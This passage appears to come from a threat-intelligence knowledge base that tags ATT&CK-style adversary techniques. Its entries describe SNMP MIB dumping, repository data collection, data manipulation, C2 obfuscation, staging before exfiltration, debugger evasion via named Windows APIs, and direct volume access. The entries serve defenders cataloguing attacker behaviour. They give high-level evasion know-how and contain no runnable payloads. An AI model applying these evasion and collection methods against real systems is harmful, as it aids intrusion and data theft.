The MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight into their systems, such as system information, hardware descriptions, physical location, and software packages.<sup>[[SANS Information Security Reading Room Securing SNMP Securing SNMP](https://app.tidalcyber.com/references/616c9177-ca57-45f3-a613-d6450a94697d)]</sup> The MIB may also contain device operational information, including the running configuration, routing table, and interface details.

Adversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup>

The tag is: misp-galaxy:technique="SNMP (MIB Dump)"

Data from Configuration Repository

Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.

Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[US-CERT TA17-156A SNMP Abuse 2017](https://app.tidalcyber.com/references/82b814f3-2853-48a9-93ff-701d16d97535)]</sup>

The tag is: misp-galaxy:technique="Data from Configuration Repository"

Code Repositories - Duplicate

Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third-party sites such as GitHub, GitLab, SourceForge, and Bitbucket. Users typically interact with code repositories through a web application or command-line utilities such as git.

Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software’s source code. Having access to software’s source code may allow adversaries to develop [Exploits](https://app.tidalcyber.com/technique/5a57d258-0b23-431b-b50e-3150d2c0e52c), while credentials may provide access to additional resources using [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).<sup>[[Wired Uber Breach](https://app.tidalcyber.com/references/3bdf88b3-8f41-4945-9292-e299bab4f98e)]</sup><sup>[[Krebs Adobe](https://app.tidalcyber.com/references/bc2b0b89-e00d-4beb-bf27-fe81d8c826a4)]</sup>

Note: This is distinct from [Code Repositories](https://app.tidalcyber.com/technique/2e4201da-fe83-439d-9d40-87e4c1f832fb), which focuses on conducting [Reconnaissance](https://app.tidalcyber.com/tactics/2706dc98-724b-4cf0-84b6-56cc20b0698e) via public code repositories.

The tag is: misp-galaxy:technique="Code Repositories - Duplicate"

Confluence

Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation; however, it may contain more diverse categories of useful information, such as:

  • Policies, procedures, and standards

  • Physical / logical network diagrams

  • System architecture diagrams

  • Technical system documentation

  • Testing / development credentials

  • Work / project schedules

  • Source code snippets

  • Links to network shares and other internal resources

The tag is: misp-galaxy:technique="Confluence"

Sharepoint

Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. The following is a list of example information that may hold potential value to an adversary and may be found on SharePoint:

  • Policies, procedures, and standards

  • Physical / logical network diagrams

  • System architecture diagrams

  • Technical system documentation

  • Testing / development credentials

  • Work / project schedules

  • Source code snippets

  • Links to network shares and other internal resources

The tag is: misp-galaxy:technique="Sharepoint"

Data from Information Repositories

Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives or give direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization.

The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:

  • Policies, procedures, and standards

  • Physical / logical network diagrams

  • System architecture diagrams

  • Technical system documentation

  • Testing / development credentials

  • Work / project schedules

  • Source code snippets

  • Links to network shares and other internal resources

Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://app.tidalcyber.com/technique/8ac6952d-5add-4cbc-ad39-44943ed3459b) and [Confluence](https://app.tidalcyber.com/technique/3cc64d61-7922-4e08-98ff-b76cb2173830), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.

The tag is: misp-galaxy:technique="Data from Information Repositories"

Data from Local System

Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.

Adversaries may do this using a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c), such as [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) as well as a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907), which have functionality to interact with the file system to gather information.<sup>[[show_run_config_cmd_cisco](https://app.tidalcyber.com/references/5a68a45a-a53e-5d73-a82a-0cc951071aef)]</sup> Adversaries may also use [Automated Collection](https://app.tidalcyber.com/technique/107ad6c5-79b1-468c-9519-1578bee2ac49) on the local system.

The tag is: misp-galaxy:technique="Data from Local System"

Data from Network Shared Drive

Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) may be used to gather information.

The tag is: misp-galaxy:technique="Data from Network Shared Drive"

Data from Removable Media

Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) may be used to gather information.

Some adversaries may also use [Automated Collection](https://app.tidalcyber.com/technique/107ad6c5-79b1-468c-9519-1578bee2ac49) on removable media.

The tag is: misp-galaxy:technique="Data from Removable Media"

Runtime Data Manipulation

Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.<sup>[[FireEye APT38 Oct 2018](https://app.tidalcyber.com/references/7c916329-af56-4723-820c-ef932a6e3409)]</sup><sup>[[DOJ Lazarus Sony 2018](https://app.tidalcyber.com/references/950f8c1e-8793-43b7-abc7-0c9f6790b3b7)]</sup> By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://app.tidalcyber.com/technique/9cfbe3ba-957e-49fd-9494-9870e5d0ae16) and [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:technique="Runtime Data Manipulation"

Stored Data Manipulation

Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.<sup>[[FireEye APT38 Oct 2018](https://app.tidalcyber.com/references/7c916329-af56-4723-820c-ef932a6e3409)]</sup><sup>[[DOJ Lazarus Sony 2018](https://app.tidalcyber.com/references/950f8c1e-8793-43b7-abc7-0c9f6790b3b7)]</sup> By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:technique="Stored Data Manipulation"

Transmitted Data Manipulation

Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.<sup>[[FireEye APT38 Oct 2018](https://app.tidalcyber.com/references/7c916329-af56-4723-820c-ef932a6e3409)]</sup><sup>[[DOJ Lazarus Sony 2018](https://app.tidalcyber.com/references/950f8c1e-8793-43b7-abc7-0c9f6790b3b7)]</sup> By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Manipulation may be possible over a network connection or between system processes where there is an opportunity to deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:technique="Transmitted Data Manipulation"

Data Manipulation

Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.

The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:technique="Data Manipulation"

Junk Data

Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters.

The tag is: misp-galaxy:technique="Junk Data"

Protocol Impersonation

Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic.

Adversaries may perform a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related to a trusted entity.

The tag is: misp-galaxy:technique="Protocol Impersonation"

Steganography - Duplicate

Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control.

The tag is: misp-galaxy:technique="Steganography - Duplicate"

Data Obfuscation

Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.

The tag is: misp-galaxy:technique="Data Obfuscation"

Local Data Staging

Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://app.tidalcyber.com/technique/ebd3f870-c513-4fb0-b133-15ffc1f91db2). Interactive command shells may be used, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) and bash may be used to copy data into a staging location.

Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.<sup>[[Prevailion DarkWatchman 2021](https://app.tidalcyber.com/references/449e7b5c-7c62-4a63-a676-80026a597fc9)]</sup>

The tag is: misp-galaxy:technique="Local Data Staging"

Remote Data Staging

Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://app.tidalcyber.com/technique/ebd3f870-c513-4fb0-b133-15ffc1f91db2). Interactive command shells may be used, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) and bash may be used to copy data into a staging location.

In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://app.tidalcyber.com/technique/2ba8a662-6930-4cbe-9e3d-4cbe2109fd88) and stage data in that instance.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>

By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.

The tag is: misp-galaxy:technique="Remote Data Staging"

Data Staged

Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://app.tidalcyber.com/technique/ebd3f870-c513-4fb0-b133-15ffc1f91db2). Interactive command shells may be used, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) and bash may be used to copy data into a staging location.<sup>[[PWC Cloud Hopper April 2017](https://app.tidalcyber.com/references/fe741064-8cd7-428b-bdb9-9f2ab7e92489)]</sup>

In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://app.tidalcyber.com/technique/2ba8a662-6930-4cbe-9e3d-4cbe2109fd88) and stage data in that instance.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>

Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.

The tag is: misp-galaxy:technique="Data Staged"

Data Transfer Size Limits

An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.

The tag is: misp-galaxy:technique="Data Transfer Size Limits"

Debugger Evasion

Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.<sup>[[ProcessHacker Github](https://app.tidalcyber.com/references/3fc82a92-cfba-405d-b30e-22eba69ab1ee)]</sup>

Debugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.

Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) function calls such as <code>IsDebuggerPresent()</code> and <code>NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, perform timing checks, or measure whether exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).<sup>[[hasherezade debug](https://app.tidalcyber.com/references/53b0c71d-c577-40e8-8a04-9de083e276a2)]</sup><sup>[[AlKhaser Debug](https://app.tidalcyber.com/references/d9773aaf-e3ec-4ce3-b5c8-1ca3c4751622)]</sup><sup>[[vxunderground debug](https://app.tidalcyber.com/references/8c7fe2a2-64a1-4680-a4e6-f6eefe00407a)]</sup>

Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) function calls such as <code>OutputDebugStringW()</code>.<sup>[[wardle evilquest partii](https://app.tidalcyber.com/references/4fee237c-c2ec-47f5-b382-ec6bd4779281)]</sup><sup>[[Checkpoint Dridex Jan 2021](https://app.tidalcyber.com/references/a988084f-1a58-4e5b-a616-ed31d311cccf)]</sup>

The tag is: misp-galaxy:technique="Debugger Evasion"

External Defacement

An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://app.tidalcyber.com/technique/26db57d5-ce6f-4487-a8a8-b4af1c4b6406) may ultimately cause users to distrust the systems and to question/discredit the system’s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.<sup>[[FireEye Cyber Threats to Media Industries](https://app.tidalcyber.com/references/7b9bd753-01b7-4923-9964-19c59123ace2)]</sup><sup>[[Kevin Mandia Statement to US Senate Committee on Intelligence](https://app.tidalcyber.com/references/c40a3f96-75f4-4b1c-98a5-cb38129c6dc4)]</sup><sup>[[Anonymous Hackers Deface Russian Govt Site](https://app.tidalcyber.com/references/ca63ccd4-8c81-4de6-8eb4-06a6c68ce4d3)]</sup> [External Defacement](https://app.tidalcyber.com/technique/26db57d5-ce6f-4487-a8a8-b4af1c4b6406) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as Drive-by Compromise.<sup>[[Trend Micro Deep Dive Into Defacement](https://app.tidalcyber.com/references/4886418b-3a2e-4f12-b91e-3bb2a8134112)]</sup>

The tag is: misp-galaxy:technique="External Defacement"

Internal Defacement

An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.<sup>[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]</sup> Disturbing or offensive images may be used as a part of [Internal Defacement](https://app.tidalcyber.com/technique/546a3318-0e03-4b22-95f5-c02ff69a4ebf) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary’s presence, it often takes place after other intrusion goals have been accomplished.<sup>[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]</sup>

The tag is: misp-galaxy:technique="Internal Defacement"

Defacement

Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://app.tidalcyber.com/technique/9a21c7c7-cf8e-4f05-b196-86ec39653e3b) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://app.tidalcyber.com/technique/9a21c7c7-cf8e-4f05-b196-86ec39653e3b) in order to cause user discomfort, or to pressure compliance with accompanying messages.

The tag is: misp-galaxy:technique="Defacement"

Deobfuscate/Decode Files or Information

Adversaries may use [Obfuscated Files or Information](https://app.tidalcyber.com/technique/046cc07e-8700-4536-9c5b-6ecb384f52b0) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.

One such example is the use of [certutil](https://app.tidalcyber.com/software/2fe21578-ee31-4ee8-b6ab-b5f76f97d043) to decode a remote access tool portable executable file that has been hidden inside a certificate file.<sup>[[Malwarebytes Targeted Attack against Saudi Arabia](https://app.tidalcyber.com/references/735647f9-9cd4-4a20-8812-4671a3358e46)]</sup> Another example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload.<sup>[[Carbon Black Obfuscation Sept 2016](https://app.tidalcyber.com/references/bed8ae68-9738-46fb-abc9-0004fa35636a)]</sup>

Sometimes a user’s action may be required to open it for deobfuscation or decryption as part of [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.<sup>[[Volexity PowerDuke November 2016](https://app.tidalcyber.com/references/4026c055-6020-41bb-a4c8-54b308867023)]</sup>

The tag is: misp-galaxy:technique="Deobfuscate/Decode Files or Information"

Deploy Container

Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.

Containers can be deployed by various means, such as via Docker’s <code>create</code> and <code>start</code> APIs or via a web application such as the Kubernetes dashboard or Kubeflow.<sup>[[Docker Containers API](https://app.tidalcyber.com/references/2351cb32-23d6-4557-9c52-e6e228402bab)]</sup><sup>[[Kubernetes Dashboard](https://app.tidalcyber.com/references/02f23351-df83-4aae-a0bd-614ed91bc683)]</sup><sup>[[Kubeflow Pipelines](https://app.tidalcyber.com/references/0b40474c-173c-4a8c-8cc7-bac2dcfcaedd)]</sup> Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.<sup>[[Aqua Build Images on Hosts](https://app.tidalcyber.com/references/efd64f41-13cc-4b2b-864c-4d2352cdadcd)]</sup>

The tag is: misp-galaxy:technique="Deploy Container"

Code Signing Certificates - Duplicate

Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.<sup>[[Wikipedia Code Signing](https://app.tidalcyber.com/references/363e860d-e14c-4fcd-985f-f76353018908)]</sup> Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don’t know who issued the certificate or who the author is.

Prior to [Code Signing](https://app.tidalcyber.com/technique/9449c0d5-7445-45e0-9861-7aafd6531733), adversaries may develop self-signed code signing certificates for use in operations.

The tag is: misp-galaxy:technique="Code Signing Certificates - Duplicate"

Digital Certificates - Duplicate

Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).

Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://app.tidalcyber.com/technique/ce822cce-f7f1-4753-bff1-12e5bef66d53) with [Web Protocols](https://app.tidalcyber.com/technique/9a21ec7b-9714-4073-9bf3-4df41995c698)) or even enabling [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) if added to the root of trust (i.e. [Install Root Certificate](https://app.tidalcyber.com/technique/3a956db0-a3f0-442a-a981-db2ee20d60b2)).

After creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://app.tidalcyber.com/technique/0b2a9df9-65c8-4a01-a0e6-d411e54a4c7b)) on infrastructure under their control.

The tag is: misp-galaxy:technique="Digital Certificates - Duplicate"

Exploits - Duplicate

Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.<sup>[[NYTStuxnet](https://app.tidalcyber.com/references/38b0cf78-88d0-487f-b2b0-81264f457dd0)]</sup> Adversaries may use information acquired via [Vulnerabilities](https://app.tidalcyber.com/technique/fe96475a-3090-449d-91fd-ae73cb4d9c7c) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.<sup>[[Irongeek Sims BSides 2017](https://app.tidalcyber.com/references/ce11568a-36a8-4da2-972f-9cd67cc337d8)]</sup>

As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary’s exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.

Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a), [Exploitation for Client Execution](https://app.tidalcyber.com/technique/068df3d7-f788-44e4-9e6b-2ae443af1609), [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c), [Exploitation for Defense Evasion](https://app.tidalcyber.com/technique/15b65bf2-dbe5-47bc-be09-ed97684bf391), [Exploitation for Credential Access](https://app.tidalcyber.com/technique/afdfa503-0464-4b42-a79c-a6fc828492ef), [Exploitation of Remote Services](https://app.tidalcyber.com/technique/51ff4ada-8a71-4801-9cb8-a6e216eaa4e4), and [Application or System Exploitation](https://app.tidalcyber.com/technique/2109de05-5b45-4519-94a2-6c04f7d88286)).

The tag is: misp-galaxy:technique="Exploits - Duplicate"

Malware - Duplicate

Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup><sup>[[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)]</sup><sup>[[ActiveMalwareEnergy](https://app.tidalcyber.com/references/f2ef73c6-5d4c-423e-a3f5-194cba121eb1)]</sup><sup>[[FBI Flash FIN7 USB](https://app.tidalcyber.com/references/42dc957c-007b-4f90-88c6-1afd6d1032e8)]</sup>

As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary’s malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.

Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed to communicate with Twitter for C2 may require use of Web Services.<sup>[[FireEye APT29](https://app.tidalcyber.com/references/78ead31e-7450-46e8-89cf-461ae1981994)]</sup>

The tag is: misp-galaxy:technique="Malware - Duplicate"

Develop Capabilities

Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup><sup>[[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)]</sup><sup>[[Bitdefender StrongPity June 2020](https://app.tidalcyber.com/references/7d2e20f2-20ba-4d51-9495-034c07be41a8)]</sup><sup>[[Talos Promethium June 2020](https://app.tidalcyber.com/references/188d990e-f0be-40f2-90f3-913dfe687d27)]</sup>

As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary’s development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.

The tag is: misp-galaxy:technique="Develop Capabilities"

Device Driver Discovery

Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://app.tidalcyber.com/technique/9e945aa5-3883-4537-a767-f49bdcce26c7)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c)).

Many OS utilities may provide information about local device drivers, such as driverquery.exe and the EnumDeviceDrivers() API function on Windows.<sup>[[Microsoft Driverquery](https://app.tidalcyber.com/references/7302dc00-a75a-5787-a04c-88ef4922ac09)]</sup><sup>[[Microsoft EnumDeviceDrivers](https://app.tidalcyber.com/references/647ffc70-8eab-5f2f-abf4-9bbf42554043)]</sup> Information about device drivers (as well as associated services, i.e., [System Service Discovery](https://app.tidalcyber.com/technique/e0a347e2-2ac5-458b-ab0f-18d81b6d6055)) may also be available in the Registry.<sup>[[Microsoft Registry Drivers](https://app.tidalcyber.com/references/4bde767e-d4a7-56c5-9aa3-b3f3cc2e3e70)]</sup>

On Linux/macOS, device drivers (in the form of kernel modules) may be visible within /dev or using utilities such as lsmod and modinfo.<sup>[[Linux Kernel Programming](https://app.tidalcyber.com/references/70f31f19-e0b3-40b1-b8dd-6667557bb334)]</sup><sup>[[lsmod man](https://app.tidalcyber.com/references/c2f88274-9da4-5d24-b68d-302ee5990dd5)]</sup><sup>[[modinfo man](https://app.tidalcyber.com/references/d4f2db5c-ef6d-556d-a5e2-f6738277fecd)]</sup>

The tag is: misp-galaxy:technique="Device Driver Discovery"

Direct Volume Access

Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools.<sup>[[Hakobyan 2009](https://app.tidalcyber.com/references/d92f6dc0-e902-4a4a-9083-8d1667a7003e)]</sup>

Utilities, such as NinjaCopy, exist to perform these actions in PowerShell.<sup>[[Github PowerSploit Ninjacopy](https://app.tidalcyber.com/references/e92aed6b-348b-4dab-8292-fee0698e4a85)]</sup> Adversaries may also use built-in or third-party utilities (such as vssadmin, wbadmin, and [esentutl](https://app.tidalcyber.com/software/a7589733-6b04-4215-a4e7-4b62cd4610fa)) to create shadow copies or backups of data from system volumes.<sup>[[LOLBAS Esentutl](https://app.tidalcyber.com/references/691b4907-3544-4ad0-989c-b5c845e0330f)]</sup>

The tag is: misp-galaxy:technique="Direct Volume Access"

Disk Content Wipe

Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.

